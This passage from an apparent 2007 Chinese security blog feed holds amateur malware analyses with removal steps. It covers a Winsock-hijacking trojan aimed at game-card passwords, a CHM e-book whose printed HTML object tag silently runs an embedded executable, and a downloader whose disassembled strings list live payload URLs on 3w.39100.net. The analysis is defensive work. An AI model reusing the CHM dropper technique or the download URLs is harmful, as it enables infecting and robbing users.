<p>样本可能为下载者所下载，运行后释放ws2ifsl.sys到%systemroot%\system32\drivers\目录下，注册驱动，释放avp.exe到%systemroot%\目录下，注册服务，释放tf6sound.dll到%systemroot%\system32\目录下挟持winsock的tcp/ip和raw/ip，调用释放的批处理文件删除病毒文件。</p>
<p><strong><font color="#0000ff">病毒修改和新建注册表项：</font></strong></p>
<p><strong><font color="#0000ff"></font></strong><br>
<strong>挟持Winsock：</strong><br>
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2</p>
<p>\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001\PackedCatalogItem<br>
C:\WINNT\system32\tf6sound.dll<br>
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2</p>
<p>\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013\PackedCatalogItem<br>
C:\WINNT\system32\tf6sound.dll<br>
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2</p>
<p>\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013\PackedCatalogItem<br>
C:\WINNT\system32\tf6sound.dll<br>
<font color="#0000ff"><strong>还有其他默认上面的改动不列举</strong></font><br>
<strong>反汇编分析tf6sound.dll：<br>
</strong><font color="#0000ff"><strong>猜测病毒挟持winsock在后台使用多个IP地址刷流量，本人对游戏不是很了解，不过被刷的网站是和游戏点卡相关的，列举一下被刷名和IP。<br>
</strong></font>连接网页：<a href="https://tw.gash.gamania.com/GASHLogin.aspx">https://tw.gash.gamania.com/GASHLogin.aspx</a></p>
<p>CODE:00421AD4 s_Changegashpas db 'ChangeGashPass:<font color="#ff0000"><strong>gash**:</strong></font>',0 ; DATA XREF: sub_41FD20+F14 o</p>
<p>CODE:00421BFC s_Changegamepas db 'ChangeGamePass:<font color="#ff0000"><strong>gamea**ount</strong></font>:',0　　</p>
<p><strong><font color="#ff0000">PS：用这种方法来给自己充点卡是不道德的，用户名暂不列出，希望病毒作者好自为之。</font></strong></p>
<p>61.220.62.*　<br>
61.220.56.*-61.220.56.*<br>
203.69.46.*-203.69.46.*<br>
220.130.113.*<br>
220.130.125.13*<br>
220.130.125.14*-220.130.125.14*<br>
220.130.125.18*-220.130.125.18*<br>
220.130.125.24*-220.130.125.24*<br>
220.130.125.21*-220.130.125.21*<br>
220.130.125.17*-220.130.125.17*</p>
<p><br>
<strong>注册服务：</strong><br>
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VGADown\<br>
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_VGADOWN\<br>
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_VGADOWN\<br>
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VGADown\<br>
服务名称：VGADown<br>
显示名称：Audio Adapter<br>
服务映象：%systemdrive%\%systemroot%\avp.exe<br>
启动方式：自动<br>
服务描述；无<br>
服务隶属于：LocalSystem<br>
<strong>注册驱动：<br>
</strong>HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WS2IFSL\<br>
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_WS2IFSL\<br>
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WS2IFSL\<br>
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WS2IFSL\<br>
服务名称：WS2IFSL<br>
显示名称：Windows 套接字 2 .0 Non-IFS 服务提供程序支持环境<br>
服务映象：%systemdrive%\%systemroot%\system32\drivers\ws2ifsl.sys<br>
启动方式：自动<br>
服务描述：无<br>
服务隶属于：LocalSystem<br>
<font color="#0000ff"><strong>有必要说明一下病毒的两个主文件，ws2ifsl.sys与avp.exe，avp.exe是病毒的进程文件，属于win32服务类别，可以在任务管理器中看到，ws2ifsl.sys属于系统驱动，虽然启动方式为非系统和引导，但是也无法看到病毒进程。</strong></font></p>
<p><font color="#ff0000"><strong>清除方法：</strong></font><br>
<font color="#0000ff"><strong>打开IceSword找到ws2ifsl.sysavp.exe强制卸除，删除病毒注册的驱动和服务注册表项（整个项），使用SREng首先修复安全模式，在安全模式下删除N/A的winsock，使用syscheak的winsock修复功能修复winsock协议（SREng无法修复但可以删除，）删除tf6sound.dll，重启计算机，杀毒完毕。</strong></font></p>
<p><strong><font color="#ff0000">PS：不要试图在正常模式下强制删除和反注册tf6sound.dll，会造成服务错误重启计算机的。</font></strong><br>
</p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/renlangliu/blog/category/%B2%A1%B6%BE%CB%EA%D4%C2">病毒岁月</a>&nbsp;<a href="http://hi.baidu.com/renlangliu/blog/item/fbc2c258bf0eaa80800a1897.html#comment">查看评论</a>]]></description>
        <pubDate>2007-05-28  16:22</pubDate>
        <category><![CDATA[病毒岁月]]></category>
        <author><![CDATA[renlangliu]]></author>
		<guid>http://hi.baidu.com/renlangliu/blog/item/fbc2c258bf0eaa80800a1897.html</guid>
</item>

<item>
        <title><![CDATA[[原创]：病毒分析text.exe(已更新)]]></title>
        <link><![CDATA[http://hi.baidu.com/renlangliu/blog/item/ca0bc213cf8340035aaf53d1.html]]></link>
        <description><![CDATA[
		
		<p>样本来自：<a href="http://bbs.kafan.cn/viewthread.php?tid=89554&amp;extra=page%3D1">http://bbs.kafan.cn/viewthread.php?tid=89554&amp;extra=page%3D1</a></p>
<p><font color="#ff0000" size="3"><strong>写在前面：孤单每一天第二次提醒大家在网络上面少接触一些不健康的东西，色子头上一把刀</strong></font></p>
<p>粗浅分析：</p>
<p>该文件是CHM文档，使用了内部java脚本嵌入的方法种植了病毒程序text.exe：</p>
<p>&lt;/script&gt;<br>
&lt;body onselectstart="return false"; onpaste="return false";&gt;<br>
&lt;img src="test.exe" width=0 height=0&gt;<br>
&lt;img src="001.jpg"&gt;<br>
&lt;object id="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="test.exe"&gt;<br>
&lt;/object&gt;<br>
&lt;/body&gt;</p>
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/renlangliu/pic/item/e275f6dd89133bea76c6382c.jpg"></div>
<p>当运行这个帮助文档的时候就会执行病毒程序。病毒释放路径为：</p>
<p>C:\WINDOWS\Downloaded Program Files\test.exe（没有环境变量的判断）</p>
<p>对于这种挂马的方式记得几个月前见过，希望不会有发展，不然小说迷们可救遭殃了，当然也有修复的方法，就拿这个病毒来说，去掉病毒运行很容易的，使用UE直接抹掉就可以，搜索关键字text.exe替换为????????，之后保存。</p>
<p>对比一下：</p>
<p> </p>
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/renlangliu/pic/item/b36a3b340d98a83e5bb5f52d.jpg"></div>
<p> </p>
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/renlangliu/pic/item/399f9eb14f10e2510923022d.jpg"></div>
<div forimg="1">
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/renlangliu/pic/item/686451a717306390d143582d.jpg"></div>
<div forimg="1"></div>
<div forimg="1">之后文件打开后就不会中毒了，因为病毒的目录索引被毁了，就算病毒存在也不会运行，相关的图片不方便贴出，见谅</div>
</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/renlangliu/blog/category/%B2%A1%B6%BE%CB%EA%D4%C2">病毒岁月</a>&nbsp;<a href="http://hi.baidu.com/renlangliu/blog/item/ca0bc213cf8340035aaf53d1.html#comment">查看评论</a>]]></description>
        <pubDate>2007-05-27  01:04</pubDate>
        <category><![CDATA[病毒岁月]]></category>
        <author><![CDATA[renlangliu]]></author>
		<guid>http://hi.baidu.com/renlangliu/blog/item/ca0bc213cf8340035aaf53d1.html</guid>
</item>

<item>
        <title><![CDATA[[原创]下载者qrypz.exe浅析]]></title>
        <link><![CDATA[http://hi.baidu.com/renlangliu/blog/item/f06bc707807f5bcc7b8947a3.html]]></link>
        <description><![CDATA[
		
		<p>样本来自：<a href="http://bbs.kafan.cn/viewthread.php?tid=89016&amp;extra=page%3D1">http://bbs.kafan.cn/viewthread.php?tid=89016&amp;extra=page%3D1</a></p>
<p>.rdata:121520DC s_Urldownloadto db 'URLDownloadToFileA',0 ; DATA XREF: .text:12151488 o</p>
<p>.rdata:12152118 s_ProgramFilesI db 'program files\Internet Explorer\IEXPLORE.EXE',0</p>
<p>.rdata:12152284 s_File1_5D15_zi db 'file/1.5/d15.zip',0 ; DATA XREF: start+153 o<br>
.rdata:12152295&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:12152298 s_Docprop1_dll&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db '\DocProp1.dll',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: start+123 o<br>
.rdata:121522A6&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:121522A8 ; char s_File1_5M15_zi[]<br>
.rdata:121522A8 s_File1_5M15_zi db 'file/1.5/m15.zip',0 ; DATA XREF: start+103 o<br>
.rdata:121522B9&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:121522BC ; char s_Http3w_39100_[]<br>
.rdata:121522BC s_Http3w_39100_ db 'http://3w.39100.net/',0 ; DATA XREF: start+F1 o<br>
</p>
<p><strong>//调用URLDownloadToFileA函数开启IE后台进行小马下大马，两个木马的连接为（以证实）：</strong></p>
<p><font color="#0000ff"><strong>http://3w.39100.net/file/1.5/d15.zip</strong></font></p>
<p><font color="#0000ff"><strong>http://3w.39100.net/file/1.5/m15.zip</strong></font></p>
<p>.rdata:12152210 s_SoftwareMic_0 db 'Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\msv1_1\',0</p>
<p>.rdata:121521E8 s_Dllname&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'DllName',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: start+3C0 o<br>
.rdata:121521F0 s_Msv1_1_dll_0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'msv1_1.dll',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: start+395 o<br>
</p>
<p><strong>//写注册表挂接winlogon.exe进程</strong></p>
<p><font color="#ff0000"><strong>d15.zip浅析：</strong></font></p>
<p><strong>被下载的木马实则为PE文件，应该是该病毒的空间无法上传PE文件导致病毒幕后使用者更改扩展名，如图：</strong></p>
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/renlangliu/pic/item/7d0c420f9ff54f2f6059f336.jpg"></div>
<div forimg="1"><font color="#0000ff"><strong>待d15.zip'下载完成运行后，同上：</strong></font></div>
<div forimg="1"></div>
<div forimg="1">.rdata:35155114 s_ProgramFilesI db 'program files\Internet Explorer\IEXPLORE.EXE',0<br>
.rdata:35155114&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_35151DA5+62 o<br>
.rdata:35155114&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_35152D5C+83 o<br>
.rdata:35155141&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:35155144 ; char s_Urldownloadto[]<br>
.rdata:35155144 s_Urldownloadto db 'URLDownloadToFileA',0 ; DATA XREF: sub_35151E2F+32 o<br>
.rdata:351552D0 s_Login_asp?cpu db 'login.asp?cpuid=',0 ; DATA XREF: sub_35152F0C+10E o<br>
.rdata:351552E1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:351552E4 ; char s_Http3w_39100_[]<br>
.rdata:351552E4 s_Http3w_39100_ db 'http://3w.39100.net/',0 ; DATA XREF: sub_35152F0C+FD o<br>
</div>
<div forimg="1"><strong>//尝试连接http://3w.39100.net/login.asp?</strong></div>
<div forimg="1"></div>
<div forimg="1">.rdata:351553E8 s_File1_5D15_zi db 'file/1.5/d15.zip',0 ; DATA XREF: DllEntryPoint+139 o<br>
.rdata:351553F9&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:351553FC ; char s_Docprop1_dll[]<br>
.rdata:351553FC s_Docprop1_dll&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db '\DocProp1.dll',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: DllEntryPoint+115 o<br>
.rdata:3515540A&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:3515540C ; char s_File1_5Fb15_z[]<br>
.rdata:3515540C s_File1_5Fb15_z db 'file/1.5/fb15.zip',0 ; DATA XREF: DllEntryPoint+F7 o<br>
.rdata:3515541E&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
.rdata:35155420 ; char s_File1_5Server[]<br>
.rdata:35155420 s_File1_5Server db 'file/1.5/serverhelp.zip',0<br>
.rdata:35155420&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: DllEntryPoint+9E o<br>
.rdata:35155420&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DllEntryPoint+A9 o<br>
</div>
<div forimg="1"><strong>//继续进行下载，下载文件如下（已证实）：</strong></div>
<div forimg="1"><strong><font color="#0000ff">http://3w.39100.net/file/1.5/serverhelp.zip</font></strong></div>
<div forimg="1"><strong><font color="#0000ff">http://3w.39100.net/file/1.5/fb15.zip</font></strong></div>
<div forimg="1"></div>
<div forimg="1"><br>
.rdata:35155244 ; char s_ShellAutoComm[]<br>
.rdata:35155244 s_ShellAutoComm db 'shell\Auto\command',0 ; DATA XREF: sub_351529E9+1CB o<br>
.rdata:35155257&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:35155258 ; char s_Shellexecute[]<br>
.rdata:35155258 s_Shellexecute&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'shellexecute',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_351529E9+1B5 o<br>
.rdata:35155265&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:35155268 ; char s_Autorun[]<br>
.rdata:35155268 s_Autorun&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'AutoRun',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_351529E9+19F o<br>
.rdata:35155270 ; char s_Open[]<br>
.rdata:35155270 s_Open&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'OPEN',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_351529E9+19A o<br>
.rdata:35155275&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:35155278 ; char String[]<br>
.rdata:35155278 String&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db '1.5',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_351529E9+147 o<br>
.rdata:35155278&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_351529E9+1DA o<br>
.rdata:35155278&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_35152F0C+5A o<br>
.rdata:35155278&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_351535CB+49 o<br>
.rdata:35155278&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_35153A30+4A o<br>
.rdata:3515527C ; char s_Ver[]<br>
.rdata:3515527C s_Ver&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'ver',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_351529E9+12F o<br>
.rdata:3515527C&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_351529E9+1DF o<br>
.rdata:3515527C&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_351535CB+4E o<br>
.rdata:3515527C&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_35153A30+39 o<br>
.rdata:35155280 ; char s_Autorun_inf[]<br>
.rdata:35155280 s_Autorun_inf&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'autorun.inf',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_351529E9+100 o<br>
.rdata:35155280&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_35152C2D+B0 o<br>
.rdata:3515528C ; char s_Recycler_0[]<br>
.rdata:3515528C s_Recycler_0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'RECYCLER\',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_351529E9+BC o<br>
.rdata:3515528C&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_35152C2D+6C o<br>
.rdata:35155296&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:35155298 ; char s_Recycler[]<br>
.rdata:35155298 s_Recycler&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'RECYCLER',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_351529E9+33 o<br>
.rdata:351552A1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4</div>
<div forimg="1"><br>
</div>
<div forimg="1"><strong>//该病毒为autorun病毒，将自身写入回收站目录中</strong></div>
<div forimg="1"></div>
<div forimg="1"><strong><font color="#ff0000">serverhelp.zip浅析</font></strong></div>
<div forimg="1"><strong><font color="#ff0000"></font></strong></div>
<div forimg="1"><strong><font color="#0000ff">serverhelp.zip是一个VC++写得dll程序，伪装为zip文件，里面只获得如下脚本：</font></strong></div>
<div forimg="1">.rdata:09167538&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; unicode 0, &lt;my applet&gt;,0<br>
.rdata:0916754C s_Afterbegin:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_9153920+CF o<br>
.rdata:0916754C&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; unicode 0, &lt;afterBegin&gt;,0<br>
.rdata:09167562&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 8<br>
.rdata:09167568 ; char s_&lt;divIdTmpdiv&gt;[]<br>
.rdata:09167568 s_&lt;divIdTmpdiv&gt; db '&lt;div id=tmpdiv&gt;&lt;/div&gt;&amp;nbsp;&lt;script&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; language=javascript&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; src=%s&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; defer&gt;&lt;/script&gt;',0<br>
